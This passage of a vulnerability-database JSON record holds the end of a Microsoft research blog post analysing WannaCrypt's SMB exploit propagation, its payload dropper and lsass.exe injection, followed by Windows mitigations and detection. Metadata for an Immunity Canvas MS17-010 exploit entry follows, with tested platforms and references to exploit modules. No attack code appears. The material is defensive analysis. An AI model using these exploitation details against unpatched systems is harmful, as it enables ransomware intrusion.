The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n![Figure 16. Bootstrap DLL functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-16c.-Bootstrap-DLL-functions.png)\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n![Figure 17. Dropping main payload to file system](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-17a.-Dropping-main-payload-to-file-system.png)\n\n_Figure 17. Dropping main payload to file system_\n\n![Figure 18. Creating the main payload process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-18a.-Creating-the-main-payload-process.png)\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. 
Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. WannaCrypt hooking, however, is too brief for PatchGuard to fire. 
Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n![Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-19a.-Windows-Defender-ATP-detection-of-an-anomalous-process-spawned-from-a-system-process.png)\n\n_Figure 19. 
Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 1125, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": 
"attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, 
"exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "080dae4ea66265fa78479c14627307740cef06e322e71100de23a9480440e2a8", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "896dd514d3c2f23798f33d98b9b71e55"}, {"key": "href", "hash": "4e457e516171c49f292e8aa2146ca307"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "63a4a976f3c89eaa70e50a2c25ba2834"}, {"key": "published", "hash": "63a4a976f3c89eaa70e50a2c25ba2834"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "f0bf0c408802a9b71e13a50fb429713c"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}], "canvas": [{"id": "MS17_010", "bulletinFamily": "exploit", "title": "Immunity Canvas: MS17_010", "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 
\nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ \nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n \n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "published": "2017-03-17T00:59:00", "modified": "2017-03-17T00:59:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "reporter": "Immunity Canvas", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "type": "canvas", "lastseen": "2021-07-28T14:33:36", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 \nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ 
\nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n \n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-11-01T14:03:33", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ETERNALBLUE"], "type": "canvas"}, {"idList": ["CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", 
"THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}]}, "score": {"modified": "2018-11-01T14:03:33", "value": 5.0, "vector": "NONE"}}, "hash": "89644140a5b62e0842d05455ea69f8ffdae9ffd2d0f28954cd7470fa9b2086ec", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "206c88939ab5a83df743f16043cf2bfb", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "104e09b5ff5b1ce3bc17f5fe64295116", "key": "published"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": 
"886297e4ad999f269e3a85b85f7bbdd0", "key": "description"}, {"hash": "14b43373035e95c34886272d7dc25baa", "key": "href"}, {"hash": "104e09b5ff5b1ce3bc17f5fe64295116", "key": "modified"}, {"hash": "8e708b071b800ae1142b16ab81c46b63", "key": "title"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "id": "MS17_010", "lastseen": "2018-11-01T14:03:33", "modified": "2017-03-16T20:59:04", "objectVersion": "1.3", "published": "2017-03-16T20:59:04", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: MS17_010", "type": "canvas", "viewCount": 502}, "differentElements": ["cvss", "published", "modified"], "edition": 1, "lastseen": "2018-11-01T14:03:33"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "**Name**| ms17_010 \n---|--- \n**CVE**| CVE-2017-0143, CVE-2017-0146 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS17-010 \n**Notes**| CVE Name: CVE-2017-0143, CVE-2017-0146 \nVENDOR: Microsoft \nNOTES: https://github.com/worawit/MS17-010 \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-one-leak-and-control/ \nhttps://www.crowdstrike.com/blog/badrabbit-ms17-010-exploitation-part-two-elevate-privileges/ \nhttps://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf \nTested on: \n\\- Windows 10 Enterprise N 14393 64bit \n\\- Windows 8.1 9600 32bit \n\\- Windows 7 Home Basic 7601 Service Pack 1 64bit \n\\- Windows 7 Professional N 7601 Service Pack 1 32bit \n \n\\- Windows Server 2016 Standard 14393 \n\\- Windows Server 2012 R2 Standard 9600 \n\\- Windows Server 2008 R2 Datacenter 7600 64bit \n \nVersionsAffected: \nRepeatability: Infinite \nMSADV: MS17-010 \nReferences: 
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 \nDate public: 03/16/2017 \nCVSS: 9.3 \n\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-05-29T19:48:22", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": 
["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-05-29T19:48:22", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "bc2484f98d1a050cf25b2d562ec2eb2c25a124099d659cdc2844cff9c439e33e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, 
{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "modified"}, {"hash": "206c88939ab5a83df743f16043cf2bfb", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fcc790c72a86190de1b549d0ddc6f55c", "key": "type"}, {"hash": "886297e4ad999f269e3a85b85f7bbdd0", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "14b43373035e95c34886272d7dc25baa", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "8e708b071b800ae1142b16ab81c46b63", "key": "title"}, {"hash": "403ed403becfd91e34c7d282e2a3b12f", "key": "reporter"}], "history": [], "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms17_010", "id": "MS17_010", "immutableFields": [], "lastseen": "2019-05-29T19:48:22", "modified": "2017-03-17T00:59:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": [], "reporter": "Immunity Canvas", "title": "Immunity Canvas: MS17_010", "type": "canvas", "viewCount": 530}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2019-05-29T19:48:22"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "206c88939ab5a83df743f16043cf2bfb"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "886297e4ad999f269e3a85b85f7bbdd0"}, {"key": "href", "hash": "14b43373035e95c34886272d7dc25baa"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, 
{"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "403ed403becfd91e34c7d282e2a3b12f"}, {"key": "title", "hash": "8e708b071b800ae1142b16ab81c46b63"}, {"key": "type", "hash": "fcc790c72a86190de1b549d0ddc6f55c"}], "hash": "9870de6c1bcbf43de9bc18d7ba9de95ceb10b97dac37cbc1e3c9d67d7145221c", "viewCount": 534, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 